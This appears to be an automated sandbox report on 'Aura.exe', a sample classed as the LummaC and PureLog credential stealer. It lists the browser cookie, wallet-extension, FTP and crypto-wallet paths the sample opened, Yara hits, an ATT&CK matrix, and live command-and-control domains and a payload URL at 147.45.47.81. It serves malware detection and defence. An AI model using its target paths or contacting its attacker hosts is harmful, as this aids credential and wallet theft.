Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: Aura.exe PID: 7328, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: Aura.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Aura.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Aura.exe.3ef9550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Aura.exe.3ef9550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1654453374.0000000000BA2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1780798497.0000000003EF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	23 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 Query Registry	Remote Services	11 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	231 Security Software Discovery	Remote Desktop Protocol	41 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	211 Process Injection	Security Account Manager	23 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	3 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Deobfuscate/Decode Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Software Packing	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	22 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
http://147.45.47.81/conhost.exeD5	0%	Avira URL Cloud	safe
http://crl.miUQb	0%	Avira URL Cloud	safe
http://147.45.47.81/1J	0%	Avira URL Cloud	safe
http://147.45.47.81/f1	0%	Avira URL Cloud	safe
http://147.45.47.81/conhost.exepleWebKit/537.36	0%	Avira URL Cloud	safe
http://147.45.47.81/conhost.exe	0%	Avira URL Cloud	safe
https://fancywaxxers.shop/O	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/a	100%	Avira URL Cloud	malware
http://147.45.47.81/conhost.exeso	0%	Avira URL Cloud	safe
http://147.45.47.81/C	0%	Avira URL Cloud	safe
https://fancywaxxers.shop/api;	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
fancywaxxers.shop	104.21.80.1	true	false		high

Contacted URLs

Name	Malicious	Reputation
rabidcowse.shop	false	high
wholersorie.shop	false	high
fancywaxxers.shop	false	high
cloudewahsj.shop	false	high
noisycuttej.shop	false	high
nearycrepso.shop	false	high
https://fancywaxxers.shop/api	false	high
framekgirus.shop	false	high
tirepublicerj.shop	false	high
abruptyopsn.shop	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.miUQb	Aura.exe, 00000003.00000002.2898316095.00000000016E9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net03	Aura.exe	false		high
http://147.45.47.81/	Aura.exe, 00000003.00000002.2898376850.000000000172E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.entrust.net02	Aura.exe	false		high
http://www.entrust.net/rpa03	Aura.exe	false		high
https://fancywaxxers.shop/a	Aura.exe, 00000003.00000002.2898411486.0000000001745000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://147.45.47.81/f1	Aura.exe, 00000003.00000002.2898376850.000000000172E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://aia.entrust.net/ts1-chain256.cer01	Aura.exe	false		high
http://upx.sf.net	Amcache.hve.6.dr	false		high
http://147.45.47.81/conhost.exeD5	Aura.exe, 00000003.00000002.2898360681.0000000001727000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://147.45.47.81/conhost.exe	Aura.exe, 00000003.00000002.2898411486.0000000001745000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fancywaxxers.shop/O	Aura.exe, 00000003.00000002.2898411486.0000000001745000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://147.45.47.81/1J	Aura.exe, 00000003.00000002.2898376850.000000000172E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://147.45.47.81/conhost.exepleWebKit/537.36	Aura.exe, 00000003.00000002.2897986678.00000000012FB000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/ts1ca.crl0	Aura.exe	false		high
http://147.45.47.81/conhost.exeso	Aura.exe, 00000003.00000002.2898411486.0000000001745000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fancywaxxers.shop/	Aura.exe, 00000003.00000002.2898297311.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://147.45.47.81/C	Aura.exe, 00000003.00000002.2898376850.000000000172E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/2048ca.crl0	Aura.exe	false		high
https://fancywaxxers.shop:443/api	Aura.exe, 00000003.00000002.2898428114.000000000174E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/api;	Aura.exe, 00000003.00000002.2898316095.00000000016E9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.entrust.net/rpa0	Aura.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
147.45.47.81	unknown	Russian Federation		2895	FREE-NET-ASFREEnetEU	false
104.21.80.1	fancywaxxers.shop	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1584537
Start date and time:	2025-01-05 19:36:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Aura.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/5@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 36 Number of non-executed functions: 35
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.20, 40.126.32.133, 172.202.163.200, 13.107.246.45
Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Aura.exe

Simulations

Behavior and APIs

Time	Type	Description
13:36:56	API Interceptor	9x Sleep call for process: Aura.exe modified
13:37:06	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
147.45.47.81	Collapse.exe	Get hash	malicious	LummaC	Browse	147.45.47.81/conhost.exe
	tyhkamwdmrg.exe	Get hash	malicious	LummaC Stealer	Browse	147.45.47.81/conhost.exe
	fkydjyhjadg.exe	Get hash	malicious	LummaC Stealer	Browse	147.45.47.81/conhost.exe
	Call 0f Duty A1 Launcher.exe	Get hash	malicious	LummaC Stealer	Browse	147.45.47.81/conhost.exe
	Call 0f Duty A1 Launcher.exe	Get hash	malicious	LummaC Stealer	Browse	147.45.47.81/conhost.exe
	Script.exe	Get hash	malicious	LummaC Stealer	Browse	147.45.47.81/conhost.exe
	n7ZKbApaa3.dll	Get hash	malicious	LummaC, Xmrig	Browse	147.45.47.81/WinRing0x64.sys
	PqSIlYOaIF.exe	Get hash	malicious	LummaC, Xmrig	Browse	147.45.47.81/WinRing0x64.sys
	Set-up.exe	Get hash	malicious	LummaC	Browse	147.45.47.81/conhost.exe
	Set-up.exe	Get hash	malicious	LummaC Stealer	Browse	147.45.47.81/conhost.exe
104.21.80.1	http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8X	Get hash	malicious	Unknown	Browse	my.cradaygo.com/smmylet
	SW_48912.scr.exe	Get hash	malicious	FormBook	Browse	www.dejikenkyu.cyou/pmpa/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	hiranetwork.com/administrator/index.php
	downloader2.hta	Get hash	malicious	XWorm	Browse	2k8u3.org/wininit.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fancywaxxers.shop	Script.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.80.1
	same.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWorm	Browse	104.21.112.1
	nayfObR.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	UhsjR3ZFTD.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	Solara-Roblox-Executor-v3.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	Delta.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	SMmAznmdAa.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	zhMQ0hNEmb.exe	Get hash	malicious	LummaC	Browse	104.21.112.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FREE-NET-ASFREEnetEU	cZO.exe	Get hash	malicious	Unknown	Browse	193.233.193.76
	iviewers.dll	Get hash	malicious	DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	147.45.44.131
	wrcaf.ps1	Get hash	malicious	DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	147.45.44.131
	iubn.ps1	Get hash	malicious	DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	147.45.44.131
	rwvg1.exe	Get hash	malicious	DcRat, KeyLogger, StormKitty, VenomRAT	Browse	147.45.44.131
	2 ps1.ps1	Get hash	malicious	KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	147.45.44.131
	lDO4WBEQyL.exe	Get hash	malicious	GO Backdoor	Browse	147.45.196.157
	vfrcxq.ps1	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	147.45.44.131
	vfdjo.exe	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, VenomRAT	Browse	147.45.44.131
	gqub.bat	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	147.45.44.131
CLOUDFLARENETUS	loader.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	188.114.97.3
	LinxOptimizer.exe	Get hash	malicious	Unknown	Browse	172.67.75.163
	Script.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.80.1
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	Set-up.exe	Get hash	malicious	LummaC	Browse	172.67.208.58
	Set-up.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	'Set-up.exe	Get hash	malicious	LummaC	Browse	172.67.178.174
	setup.exe	Get hash	malicious	LummaC	Browse	172.67.163.221
	'Set-up.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	setup.msi	Get hash	malicious	Unknown	Browse	104.21.32.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	loader.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.80.1
	Script.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.80.1
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	Set-up.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	Set-up.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	'Set-up.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	setup.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	'Set-up.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	Set-up.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	SET_UP.exe	Get hash	malicious	LummaC	Browse	104.21.80.1

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Aura.exe_919c911714a3911bab40457a30dfd2c781d27e2_27bdd1c1_3ed4ccae-f4d4-4177-b00b-f340d8e200ee\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8806287645702923
Encrypted:	false
